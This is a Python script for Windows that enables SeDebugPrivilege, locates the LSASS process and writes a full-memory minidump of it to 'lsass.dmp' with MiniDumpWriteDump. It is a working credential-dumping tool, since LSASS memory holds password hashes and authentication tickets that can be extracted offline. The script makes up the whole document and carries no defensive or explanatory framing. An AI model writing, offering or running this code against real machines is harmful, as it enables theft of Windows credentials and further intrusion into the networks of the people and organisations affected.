import win32api import win32con import win32process import win32security import win32file # For CreateFile import ctypes from ctypes import wintypes import os import psutil # Constants for MiniDumpWriteDump function MiniDumpWithFullMemory = 0x00000002 PROCESS_QUERY_INFORMATION = 0x0400 PROCESS_VM_READ = 0x0010 PROCESS_ALL_ACCESS = 0x1F0FFF dbghelp = ctypes.windll.dbghelp # MiniDumpWriteDump function argument types dbghelp.MiniDumpWriteDump.argtypes = [ wintypes.HANDLE, # Process handle wintypes.DWORD, # Process ID wintypes.HANDLE, # File handle wintypes.DWORD, # Dump type wintypes.LPVOID, # Exception parameter (can be NULL) wintypes.LPVOID, # User stream parameter (can be NULL) wintypes.LPVOID # Callback parameter (can be NULL) ] dbghelp.MiniDumpWriteDump.restype = wintypes.BOOL # Return type is BOOL # Enable SeDebugPrivilege to access system processes like LSASS def enable_debug_privilege(): try: privilege_name = win32security.LookupPrivilegeValue(None, win32security.SE_DEBUG_NAME) token = win32security.OpenProcessToken(win32api.GetCurrentProcess(), win32security.TOKEN_ADJUST_PRIVILEGES | win32security.TOKEN_QUERY) win32security.AdjustTokenPrivileges(token, False, [(privilege_name, win32security.SE_PRIVILEGE_ENABLED)]) print("SeDebugPrivilege enabled.") except Exception as e: print(f"Failed to enable SeDebugPrivilege: {e}") # Function to find LSASS process def get_lsass_pid(): try: for proc in psutil.process_iter(): try: if proc.name().lower() == "lsass.exe": print(f"Found LSASS process: PID = {proc.pid}") return proc.pid except (psutil.AccessDenied, psutil.NoSuchProcess): pass except Exception as e: print(f"Error accessing processes: {e}") return None # Function to write a minidump of the LSASS process def write_lsass_minidump(output_path): pid = get_lsass_pid() if not pid: print("LSASS process not found.") return False print(f"Found LSASS process with PID: {pid}") # Open the LSASS process h_process = win32api.OpenProcess(PROCESS_ALL_ACCESS, False, pid) if not h_process: print(f"Failed to open LSASS process with PID: {pid}") return False # Create a file to write the dump using win32file h_file = win32file.CreateFile( output_path, win32con.GENERIC_WRITE, 0, None, win32con.CREATE_ALWAYS, win32con.FILE_ATTRIBUTE_NORMAL, None ) if h_file == win32file.INVALID_HANDLE_VALUE: print("Failed to create dump file.") return False # Ensure the process and file handles are explicitly cast to ctypes-compatible handles h_process_ctypes = ctypes.wintypes.HANDLE(int(h_process)) h_file_ctypes = ctypes.wintypes.HANDLE(int(h_file)) # Call MiniDumpWriteDump to write the minidump to the file success = dbghelp.MiniDumpWriteDump( h_process_ctypes, # Process handle (ctypes HANDLE) pid, # Process ID (as integer) h_file_ctypes, # File handle (ctypes HANDLE) MiniDumpWithFullMemory, # Dump type None, # Exception parameter (can be NULL) None, # User stream parameter (can be NULL) None # Callback parameter (can be NULL) ) if success: print(f"Minidump written successfully to {output_path}") else: print(f"Failed to write minidump for LSASS. Error: {ctypes.GetLastError()}") # Close the file handle win32file.CloseHandle(h_file) # Close the process handle win32api.CloseHandle(h_process) return success # Enable SeDebugPrivilege before writing minidump enable_debug_privilege() # Specify the path for the minidump file dump_file_path = os.path.join(os.getcwd(), "lsass.dmp") # Write the minidump if write_lsass_minidump(dump_file_path): print("Minidump operation completed.") else: print("Minidump operation failed.")